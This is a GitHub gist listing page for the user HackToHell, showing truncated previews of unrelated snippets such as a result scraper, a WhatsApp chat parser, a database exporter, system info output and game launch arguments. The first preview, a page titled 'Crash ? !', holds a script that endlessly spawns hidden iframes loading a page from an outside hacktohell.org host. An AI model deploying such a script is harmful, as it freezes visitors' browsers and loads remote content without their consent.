Skip to content

Instantly share code, notes, and snippets.

<html>
<head>
Crash ? !
</head>
<iframe src="http://panzi.github.io/Browser-Ponies/ponies-iframe.html#fadeDuration=500&volume=1&fps=25&speed=3&audioEnabled=false&showFps=false&showLoadProgress=true&speakProbability=0.15&paddock=true&grass=true" style="overflow:hidden;border-style:none;margin:0;padding:0;background:transparent;width:640px;490px;" width="640" height="490" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe>
<script>
while(10>9){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://goo.hacktohell.org/g.html";
#include "stdafx.h"
#include<string>
#include<iostream>
#include<conio.h>
#define SIZE 20
using namespace std;
class stack{
public:
int a[SIZE];
HWiNFO64 Version 4.50-2400
STYX ----------------------------------------------------------------------
[Current Computer]
Computer Name: STYX
Computer Description: STYX
Computer Brand Name: LENOVO Lenovo Z50-70
[Operating System]
Operating System: Microsoft Windows 8.1 Professional with Media Center (x64) Build 9600

Keybase proof

I hereby claim:

  • I am hacktohell on github.
  • I am gowtham (https://keybase.io/gowtham) on keybase.
  • I have a public key whose fingerprint is 33FD EA97 0AD0 B068 1F56 8DBA FEDE 04E1 30E0 93B7

To claim this, I am signing this object:

@HackToHell
HackToHell / auresult.py
Last active November 17, 2015 10:11
Anna University result scraper
# coding: utf-8
# In[30]:
import csv
# In[59]:
import requests
city Population zip state lat lng
Indianapolis 798,382 46201 IN 39.775006 -86.109348
Indianapolis 798,382 46202 IN 39.785063 -86.159502
Indianapolis 798,382 46203 IN 39.743025 -86.117859
Indianapolis 798,382 46204 IN 39.771986 -86.153491
Indianapolis 798,382 46205 IN 39.826761 -86.138582
Indianapolis 798,382 46208 IN 39.829905 -86.179444
Indianapolis 798,382 46218 IN 39.80817 -86.101425
Indianapolis 798,382 46219 IN 39.782092 -86.049533
Indianapolis 798,382 46220 IN 39.864685 -86.11815
@HackToHell
HackToHell / WhatsappChat backup txt parser.py
Created June 6, 2016 16:57
Makes the text into a csv
fp = open('C:/Users/Gowtham/Downloads/WhatsApp Chat with xxxx.txt','r')
text = fp.readlines()
text = [line.rstrip('\n') for line in text]
import csv
with open('names.csv', 'w') as csvfile:
fields = ['time','Name','Text']
writer = csv.DictWriter(csvfile, fieldnames=fields)
writer.writeheader()
@HackToHell
HackToHell / export.py
Created September 17, 2016 04:56
Phabricator Phriction documentation exporter script
import pandas as pd
import os
from sqlalchemy import *
engine = create_engine('mysql://root:test@127.0.0.1/test') #Change me to the phriction database
df=pd.read_sql('select * from phriction_content',engine)
def get(x):
x=x.iloc[0]
@HackToHell
HackToHell / launch.sh
Created January 11, 2017 14:15
Insurgency and TF2 launch args for Arch Linux and bumblebee
vblank_mode=0 LD_PRELOAD='/usr/$LIB/libstdc++.so.6 /usr/$LIB/libgcc_s.so.1 /usr/$LIB/libxcb.so.1 /usr/$LIB/libgpg-error.so' optirun -b primus %command%